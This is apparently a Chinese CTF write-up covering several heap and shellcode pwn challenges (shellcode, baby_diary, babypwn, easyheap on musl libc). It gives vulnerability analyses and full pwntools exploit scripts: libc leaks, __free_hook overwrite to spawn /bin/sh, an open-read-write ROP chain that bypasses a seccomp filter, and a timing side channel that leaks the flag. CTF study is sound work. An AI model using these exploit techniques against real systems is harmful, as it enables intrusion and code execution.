149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './shellcode'

context.os='linux'
#context.log_level = 'debug'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

def debug():
#gdb.attach(p)
gdb.attach(p,"b *0x40026D\n")
pause()

def cmd(op):
sla(">",str(op))

append = '''
push rdx
pop rdx
'''

shellcode_mmap = '''
/*mmap(0x40404040,0x7e,7,34,0,0)*/
push 0x40404040 /*set rdi*/
pop rdi
push 0x7e /*set rsi*/
pop rsi
push 0x40 /*set rdx*/
pop rax
xor al,0x47
push rax
pop rdx

push 0x40 /*set r8*/
pop rax
xor al,0x40
push rax
pop r8
push rax /*set r9*/
pop r9
/*syscall*/
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x31],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x32],cl
push 0x22 /*set rcx*/
pop rcx
push 0x40/*set rax*/
pop rax
xor al,0x49
'''

shellcode_read = '''
/*read(0,0x40404040,0x70)*/
push 0x40404040
pop rsi
push 0x40
pop rax
xor al,0x40
push rax
pop rdi
xor al,0x40
push 0x70
pop rdx
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl
push rdx
pop rax
xor al,0x70
'''

shellcode_retfq = '''
push rbx
pop rax

xor al,0x40
push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
'''

#debug()
def pwn(p,index,ch):
shellcode_x86 = '''
/*fp = open("flag")*/
mov esp,0x40404140
push 0x67616c66
push esp
pop ebx
xor ecx,ecx
mov eax,5
int 0x80
mov ecx,eax
'''

shellcode_flag = '''
push 0x33
push 0x40404089
retfq
/*read(fp,buf,0x70)*/
mov rdi,rcx
mov rsi,rsp
mov rdx,0x70
xor rax,rax
syscall
'''

shellcode = ""
shellcode += shellcode_mmap
shellcode += append
shellcode += shellcode_read
shellcode += append
shellcode += shellcode_retfq
shellcode += append
shellcode = asm(shellcode,arch = 'amd64',os = 'linux')

sl(shellcode)
sleep(0.3)

if index == 0:
shellcode_flag+="cmp byte ptr[rsi+{0}],{1};jz $-3;ret".format(index,ch)
else:
shellcode_flag+="cmp byte ptr[rsi+{0}],{1};jz $-4;ret".format(index,ch)

shellcode_x86 = asm(shellcode_x86,arch = 'i386',os = 'linux')
shellcode_flag = asm(shellcode_flag,arch = 'amd64',os = 'linux')
shellcode = shellcode_x86 + 0x29*b'\x90' + shellcode_flag

sl(shellcode)

index = 0
a=[]
while True:
for ch in range(0x20,127):
local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')
pwn(p,index,ch)
start = time.time()
try:
p.recv(timeout=2)
print("".join([chr(i) for i in a]))
except:
pass
end=time.time()
p.close()
if end-start>1.5:
a.append(ch)
print("".join([chr(i) for i in a]))
break
else:
print("".join([chr(i) for i in a]))
break
index = index + 1
print("".join([chr(i) for i in a]))

p.interactive()

baby_diary

1
2
3
4
5
6
baby_diary: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=664bd170fa1869d1e8bae262af76385c91c3e97d, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.

漏洞分析

整数溢出:

1
chunk_list[i] = (char *)malloc(size + 1);

负数溢出:

1
2
3
index = input();
if ( check(index) )
printf("content: %s\n", (const char *)chunk_list[index]);

有 off-by-one 漏洞:

1
2
3
4
chunk = chunk_list[index];
size_list[index] = len;
if ( len )
chunk[len + 1] = (chunk[len + 1] & 0xF0) + code2(index);
  • 可以控制 chunk[len + 1]0x0-0xf

入侵思路

本题目的核心点就是无泄露 unlink,对于所有的无泄漏 unlink 都可以考虑如下的堆风水:

  • 获取两个 unsorted chunk 进行合并,其中的第二个 chunk 末地址必须为 \x00(遗留下 FD BK 指针)
  • 重新申请大 unsorted chunk 后释放(不破坏原来的 heap 结构),然后再次进行分割,使第二个 chunk 的末尾地址为 \x30 或者 \x40 \x50 等等(有一定偏移的地址都可以)
  • 之后利用 unsortedbin 进行调整,在 FD->bk 和 BK->fd 中写入 \x30,然后覆盖为 \x00

不过本题目有点特殊,在具体的堆风水在构建时需要作出微调,可以参考如下的泄露脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
add(0x418) #0
add(0x210) #1
add(0x428) #2
add(0x438) #3
add(0x378,"8"*0x10) #4
add(0x428) #5
add(0x208) #6

dele(0)
dele(3)
dele(5)
dele(2)

add(0x440,0x427*"\x00"+"\x0e") #0
dele(0)
add(0x440,0x426*"\x00"+"\x01") #0
add(0x418) #3 0x2b0

add(0x418) #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

dele(3) # 0x2b0 - bk=0xd20
dele(2) # 0xd20

add(0x418,'\x00'*7+"\x0d"+"\n") #2 修复fd->bk(低位覆盖\x00)
add(0x418) #3

dele(3) # 0xd20
dele(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large
add(0x428,"\n") #5 修复bk->fd(低位覆盖\x00)

dele(6)
add(0x208,0x208*"\x00")

dele(6)
add(0x208,0x1ff*"\x00"+"\x0e")

add(0x418) #7
add(0x208) #8

dele(3)
add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

show(4)
ru(" content: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ec210
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

最后调整一下堆风水,劫持 tcache attack 就可以了

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# -*- coding:utf-8 -*-
from signal import pause
from pwn import *

arch = 64
challenge = './baby_diary1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x17D7)\n")
#pause()

def cmd(op):
sla(">>",str(op))

def add(size,data="\n"):
cmd(1)
sla(" size:",str(size-1))
sla(" content: ",data)

def show(index):
cmd(2)
sla("index:",str(index))

def dele(index):
cmd(3)
sla("index:",str(index))

#debug()

add(0x418) #0
add(0x210) #1
add(0x428) #2
add(0x438) #3
add(0x378,"8"*0x10) #4
add(0x428) #5
add(0x208) #6

dele(0)
dele(3)
dele(5)
dele(2)

add(0x440,0x427*"\x00"+"\x0e") #0
dele(0)
add(0x440,0x426*"\x00"+"\x01") #0
add(0x418) #3 0x2b0

add(0x418) #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

dele(3) # 0x2b0 - bk=0xd20
dele(2) # 0xd20

add(0x418,'\x00'*7+"\x0d"+"\n") #2 修复fd->bk(低位覆盖\x00)
add(0x418) #3

dele(3) # 0xd20
dele(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large
add(0x428,"\n") #5 修复bk->fd(低位覆盖\x00)

dele(6)
add(0x208,0x208*"\x00")

dele(6)
add(0x208,0x1ff*"\x00"+"\x0e")

add(0x418) #7
add(0x208) #8

dele(3)
add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

show(4)
ru(" content: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ec210
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

add(0x208,0x100*"\x00")
add(0x208,0x100*"\x00")
add(0x208,0x100*"\x00")
dele(4)
dele(11)
dele(12)
dele(6)

payload = 0x178*"\x00"+p64(0x211)+p64(free_hook)+p64(free_hook)
add(0x300,payload)

add(0x208,"/bin/sh\x00")
add(0x208,p64(system))
dele(6)

p.interactive()

babypwn

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.
1
2
3
4
5
6
babypwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=721c84a30c78ecb82a98a6d484d884a502b54fd6, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
9
10
 line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
  • 禁用 execve

漏洞分析

程序在 edit 完后会将所有的 0x11 置空,但是没有限制范围:

1
2
3
4
5
6
7
8
9
10
11
12
void __fastcall change(char *chunk)
{
while ( *chunk )
{
if ( *chunk == 0x11 )
{
*chunk = 0;
return;
}
++chunk;
}
}
  • 有 off-by-null 漏洞

入侵思路

程序的泄露模块需要逆向,先进行一波分析:

1
2
3
for ( i = 2; i > 0; --i )
a1 ^= (32 * a1) ^ ((a1 ^ (32 * a1)) >> 17) ^ (((32 * a1) ^ a1 ^ ((a1 ^ (32 * a1)) >> 17)) << 13);
return printf("%lx\n", a1);

直接使用 z3 求解,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def decode(target):
a1 = BitVec("a1",32)
x = Solver()
for i in range(2):
a1 ^= (32 * a1) ^ LShR((a1 ^ (32 * a1)),17) ^ (((32 * a1) ^ a1 ^ LShR((a1 ^ (32 * a1)),17)) << 13)
x.add(target == a1)
if(x.check()==sat):
model = str(x.model())
print(model)
pos, val = model.split('=')[:2]
re = eval(val[:-1])

print(hex(re))
return re
  • 这里弄了好久,最后发现 z3 不能直接左移,要用对应的函数 LShR

泄露 heap_base 很容易就能打 unlink 实现堆重叠,程序开了沙盒,需要使用堆上 ORW 的技术:

  • 限制了 size 大小(难以打 largebin attack),但通过劫持 tcache 可以打 IO
  • 也可以通过 TLS 泄露栈地址,然后劫持 tcache 打栈

这里我选择了后者(一般来说,程序如果限制 size 为 unsorted chunk 则选择前者,限制 size 为 tcache 就选择后者)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
# -*- coding:utf-8 -*-
from pwn import *
from z3 import *

arch = 64
challenge = './babypwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0xFCB)\n")
pause()

def cmd(op):
sla(">>>",str(op))

def add(size): # 17
cmd(1)
sla("size:",str(size))

def dele(index):
cmd(2)
sla("index:",str(index))

def edit(index,data):
cmd(3)
sla("index:",str(index))
sla("content:",data)

def show(index):
cmd(4)
sla("index:",str(index))

def decode(target):
a1 = BitVec("a1",32)
x = Solver()
for i in range(2):
a1 ^= (32 * a1) ^ LShR((a1 ^ (32 * a1)),17) ^ (((32 * a1) ^ a1 ^ LShR((a1 ^ (32 * a1)),17)) << 13)
x.add(target == a1)
if(x.check()==sat):
model = str(x.model())
print(model)
pos, val = model.split('=')[:2]
re = eval(val[:-1])

print(hex(re))
return re

add(0xe0)
show(0)
ru("\n")
leakaddr = eval(b"0x"+ru("\n"))
leakaddr1 = decode(leakaddr)
leakaddr = eval(b"0x"+ru("\n"))
leakaddr2 = decode(leakaddr)

leakaddr = leakaddr1 + leakaddr2 * 0x100000000
heap_base = leakaddr - 0x670
success("leakaddr >> "+hex(leakaddr))
success("heap_base >> "+hex(heap_base))

add(0x108)#0
heap_addr = heap_base + 0xf60
payload = p64(0)+p64(0x541)
payload += p64(heap_addr+0x30)+p64(heap_addr+0x30)+p64(0)+p64(0)+p64(heap_addr+0x10)+p64(heap_addr+0x10)
edit(1,payload)
add(0x108)#1
add(0x108)#2
add(0x108)#3
add(0x108)#4
add(0x108)#5

payload = "a"*0x108
edit(5,payload)
payload = "a"*0x100+p64(0x540)
edit(5,payload)
payload = "\x00"*0xf0+p64(0)+p64(0x111)
edit(6,payload)

for i in range(7):
add(0xf8)

for i in range(7):
dele(i+7)

dele(6)
add(0x30)

show(6)
ru("\n")
leakaddr = eval(b"0x"+ru("\n"))
leakaddr1 = decode(leakaddr)
leakaddr = eval(b"0x"+ru("\n"))
leakaddr2 = decode(leakaddr)

leakaddr = leakaddr1 + leakaddr2 * 0x100000000
libc_base = leakaddr - 0x3ec120
success("leakaddr >> "+hex(leakaddr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"]
set_context = libc_base + libc.sym["setcontext"]+61
stack_libc = libc_base + 0x5d1a40

for i in range(5):
dele(4-i)

payload = 0xb8*"a"+p64(0x111)+p64(stack_libc)+p64(heap_base+0x10)
add(0x200)
edit(0,payload)

add(0x108)#1
add(0x108)#2
add(0x108)#3

show(3)
ru("\n")
leakaddr = eval(b"0x"+ru("\n"))
leakaddr1 = decode(leakaddr)
leakaddr = eval(b"0x"+ru("\n"))
leakaddr2 = decode(leakaddr)

leakaddr = leakaddr1 + leakaddr2 * 0x100000000
stack_base = leakaddr - 0x1fc90
success("leakaddr >> "+hex(leakaddr))
success("stack_base >> "+hex(stack_base))

dele(1)
dele(5)

pop_rax_ret = libc_base+0x000000000001b500
pop_rdi_ret = libc_base+0x000000000002164f
pop_rsi_ret = libc_base+0x0000000000023a6a
pop_rdx_ret = libc_base+0x0000000000001b96
syscall_ret = libc_base+0x00000000000d2625

add(0x200)
payload = "b"*0x1d8+p64(0x100)+p64(stack_base+0x1fc48)
edit(1,payload)

# open(bss_addr,0)[4]
payload = ""
payload += p64(pop_rax_ret) + p64(2)
payload += p64(pop_rdi_ret) + p64(stack_base+0x1fd20)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)
# read(4,bss_addr,0x60)
payload += p64(pop_rax_ret) + p64(0)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(stack_base+0x1fd20)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)
# write(1,bss_addr,0x60)
payload += p64(pop_rax_ret) + p64(1)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(stack_base+0x1fd20)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)
payload += "./flag\x00"

#debug()

add(0x108)
add(0x108)
edit(5,payload)

p.interactive()

easyheap

1
2
3
4
5
6
easyheap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-x86_64.so.1, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序给了一个 libc.so,一番查找后发现这是一个 musl libc:

1
2
3
4
5
➜  pwn ./libc.so        
musl libc (x86_64)
Version 1.2.2
Dynamic Program Loader
Usage: ./libc.so [options] [--] pathname [args]
  • PS:musl 只有一个 libc,即作为 libc 也是 ld

对于 musl libc,patchelf 是无效的,需要将题目提供的 libc.so 复制到对应的目录:

1
cp libc.so /usr/lib/x86_64-linux-musl/libc.so

程序分析

想要开启程序核心功能必须先逆向解密:

1
2
3
4
5
6
7
8
9
10
do
{
data = *codep;
keyp += 2;
++codep;
sprintf(keyp, "%02x", (unsigned __int8)data ^ 0x23u);
}
while ( keyp != (char *)&zero );
if ( key[0] ^ 0x3036323130313437LL | key[1] ^ 0x6337303165363331LL
|| key[2] ^ 0x3237633763343735LL | key[3] ^ 0x3231313131363437LL )

脚本如下:

1
2
3
4
5
6
7
8
9
key=[0x3036323130313437,0x6337303165363331,0x3237633763343735,0x3231313131363437]
for i in key:
num = i
for j in range(4):
key = ""
for k in range(2):
key += chr((num % 0x100))
num = num // 0x100
print(chr(eval("0x"+key)^0x23),end="") # W31C0M3_to_QWB21

函数 Prepare 提供了4种核心功能:

1
2
3
4
5
.data:0000000000204300 90 18 00 00 00 00 00 00 90 14+funcs dq offset add                     ; DATA XREF: Prepare+230↑o
.data:0000000000204300 00 00 00 00 00 00 70 15 00 00+ ; Prepare+23C↑r
.data:0000000000204300 00 00 00 00 00 1A 00 00 00 00+dq offset dele
.data:0000000000204300 00 00 dq offset show
.data:0000000000204300 dq offset edit
  • add:输入 size 作为 num 的个数,然后输入 size 个 num,申请 (num+1)*4 大小的 chunk,以4字节为单位将数据写入 chunk,最后调用 get_op 依次遍历这些数字,并依次随机选择四则运算中的一个运算操作符进行运算,将运算结果填充到最后一个数字槽中
  • edit:重新输入 size 个 num,调用 get_op 进行计算,并将结果写回(位置错误)

函数 Challenge 需要对最后一个随机生成的数字进行猜测,程序对每一次猜测提供了两次 Silver Finger 和全局两次 Golden Finger 的功能:

  • Silver Finger 只会允许跳过当前级别对数字的猜测
  • Golden Finger 会根据用户输入的数字的数量,得到最终正确答案的数字

漏洞分析

函数 add 执行结果回写的代码:

1
2
data = &node->chunk[size + 1 - 1];
*data = get_op(chunk, size);

函数 edit 执行结果回写的代码:

1
2
sizea = size + 1;
chunk[sizea] = get_op(chunk, sizea);
  • 可以发现,函数 edit 有明显的4字节溢出

打印数据时,会输出38字节,但是 info.header->name 的值可能小于38字节:

1
2
printf("#   Name: %-38s #\n", (const char *)&info.header->name);
printf("# Level: %-38d#\n", **(unsigned int **)((char *)&info.header->level + info.header->size));
1
2
puts("Input your name!");
readn(info.header->name, len);

输入 num 时没有进行限制,导致可以将 heap 上的任意数据写入 mmapg

1
2
3
num = input_num();
......
mmapg[index] = chunk[num];

libc musl

musl 把 chunk 大小分为48类,用 size_to_class 进行计算(与 *active[48] 对应)

mallocng 在分配 meta 时,总是先分配一页的内存,然后划分为多个 meta 区域,而该页的最开始存放的就是 meta_area(这一页的内存用于管理 chunk)

1
2
3
4
5
6
struct meta_area {
uint64_t check; /* 用于和malloc_context->secret进行匹配 */
struct meta_area *next; /* 下一个节点指针 */
int nslots; /* 当前使用的meta数量 */
struct meta slots[]; /* 指向meta的指针(结构体meta_area后面的内存就是meta数组) */
};
1
2
3
4
5
6
7
8
9
struct meta {
struct meta *prev, *next; /* 双向链表 */
struct group *mem; /* 指向group */
volatile int avail_mask, freed_mask; /* 可用/释放chunk的bitmap */
uintptr_t last_idx:5; /* 表示最后一个chunk的下标 */
uintptr_t freeable:1;
uintptr_t sizeclass:6; /* group的大小,如果mem是mmap分配,固定为63 */
uintptr_t maplen:8*sizeof(uintptr_t)-12; /* 如果group是mmap分配的,则代表内存页数,否则为'0' */
};

多个相同大小的 chunk(物理相邻)以及一些控制信息会组成 group

1
2
3
4
5
6
struct group {
struct meta *meta; /* 指回meta */
unsigned char active_idx:5;
char pad[UNIT - sizeof(struct meta *) - 1]; /* 0x10字节对齐(NUIT为0x10) */
unsigned char storage[]; /* 存放chunk数据 */
};

chunk 没有专门在代码中定义,但总体结构如下:

1
2
3
4
5
6
struct chunk {
char prev_user_data[]; /* 用于存储上一个chunk的数据 */
uint8_t idx; /* 低5bit作为idx表示这是group中第几个chunk,高3bit作为预留位 */
uint16_t offset; /* 与第一个chunk的偏移 */
char user_data[]; /* 用于存储数据 */
};

测试案例:

1
2
3
add([1]*6)
add([2]*6)
add([3]*6)

可以在 GDB 中打印此数据:

1
2
3
4
5
6
7
8
pwndbg> x/20xw 0x555555604cc0 /* 释放前 */
0x555555604cc0: 0x556060e0 0x00005555 0x0000000e 0x00000000 /* chunk1 */
0x555555604cd0: 0x00000001 0x00000001 0x00000001 0x00000001
0x555555604ce0: 0x00000001 0x00000001 0xffffffff 0x00020100 /* chunk2 */
0x555555604cf0: 0x00000002 0x00000002 0x00000002 0x00000002
0x555555604d00: 0x00000002 0x00000002 0xfffffffa 0x00040200 /* chunk3 */
0x555555604d10: 0x00000003 0x00000003 0x00000003 0x00000003
0x555555604d20: 0x00000003 0x00000003 0x0000000f 0x00000000
1
2
3
4
5
6
7
8
pwndbg> x/20xw 0x555555604cc0 /* 释放后 */
0x555555604cc0: 0x00000000 0x00000000 0x0000000e 0x0000ff00 /* chunk1 */
0x555555604cd0: 0x00000001 0x00000001 0x00000001 0x00000001
0x555555604ce0: 0x00000001 0x00000001 0x00000002 0x0000ff00 /* chunk2 */
0x555555604cf0: 0x00000002 0x00000002 0x00000002 0x00000002
0x555555604d00: 0x00000002 0x00000002 0x00000010 0x0000ff00 /* chunk3 */
0x555555604d10: 0x00000003 0x00000003 0x00000003 0x00000003
0x555555604d20: 0x00000003 0x00000003 0xfffffffd 0x00000000
  • 前6个数据是输入的 num,第7个数据是计算的结果,第8个数据就是 idx offset

musl 中的 unlink 依赖与如下的函数,本身缺乏检查:

1
2
3
4
5
6
7
8
9
10
11
static inline void dequeue(struct meta **phead, struct meta *m)
{
if (m->next != m) {
m->prev->next = m->next;
m->next->prev = m->prev;
if (*phead == m) *phead = m->next;
} else {
*phead = 0;
}
m->prev = m->next = 0;
}

dequeue函数的触发条件如下:

  • 队列不能为空
  • 队列的头指针不能为空
  • 队列中至少有一个元素

入侵思路

现在有4字节的溢出,可以覆盖 chunk->idx,offset,不过首先需要利用溢出泄露 libc_base:

1
2
3
4
5
6
7
8
9
10
11
12
13
prepare()
add([0xFFFFFFFF]*20) # 0
dele(0)
add([0x0]*3) # 0
exit()
challenge([0x0], "d" * 0x18, True)
pause()
show()
ru('\xff'*0x18)
leak_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = leak_addr - 0xb7870
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))
1
2
3
4
5
6
pwndbg> telescope 0x7ffff7ffec78
00:0000│ rsi 0x7ffff7ffec78 ◂— 0x6464646464646464 ('dddddddd')
... ↓ 2 skipped
03:00180x7ffff7ffec90 ◂— 0xffffffffffffffff
... ↓ 2 skipped
06:00300x7ffff7ffeca8 —▸ 0x7ffff7ffe870 ◂— 0x1

由于 meta 所在页与 group 所在页分离,想要伪造 meta,就必须要泄露 secret:

1
mmapg[index] = chunk[num];
  • 由于 num 没有限制,因此可以将 heap 上的 secret 写入 mmapg
1
2
3
4
prepare()
add([0x0]*3) #1
exit()
challenge([("whos_your_daddy", 1228),("whos_your_daddy", 1221)])

接下来就是布置堆风水,将当前堆块的最后 4 个字节设置为 0xdeadbeef010,通过 4 字节溢出将下一个堆块的 offset 值设置为 0

释放下一个 chunk,将 meta 劫持到 0xdeadbeef010 处,然后程序会执行 dequeue 将 fake meta unlink,在此处会触发一次 WAA 任意写,我们的目标就是劫持 musl IO 并执行 system

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
# -*- coding:utf-8 -*-
from signal import pause
from pwn import *

arch = 64
challenge = './easyheap'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x1528)\nb *$rebase(0x1AC6)\n")
#pause()

def cmd(op):
sla(">>",str(op))

def prepare():
cmd(1)
sla("Code: ","W31C0M3_to_QWB21")

def add(nums):
sla("$ ", "QWB_Cr34t3")
sla("need?", str(len(nums)))
for idx,n in enumerate(nums):
sla("num", str(n))

def edit(idx, nums):
sla("$ ", "QWB_M0d1Fy")
sla("modify?", str(idx))
for idx, n in enumerate(nums):
sla("num", str(n))

def dele(idx):
sla("$ ", "QWB_D3l3Te")
sla("delete?", str(idx))

def show():
sla(">>", "3")

def exit():
sla("$ ", "QWB_G00dBye")

def challenge(answers, name=None, wait=False):
sla(">>", "2")
for ans in answers:
if wait:
time.sleep(0.1)
if type(ans) == int:
sla("answer: ", str(ans))
else:
hint, nums = ans
sla("answer: ", hint)
if hint == "whos_your_daddy":
sla("Input:", str(nums))
if name is None:
return
sla("name?", str(len(name)))
sa("name!", name)

#debug()

prepare()
add([0xFFFFFFFF]*20) #0
dele(0)
add([0x0]*3) #0
exit()
challenge([0x0], "d" * 0x18, True)
show()
ru('\xff'*0x18)
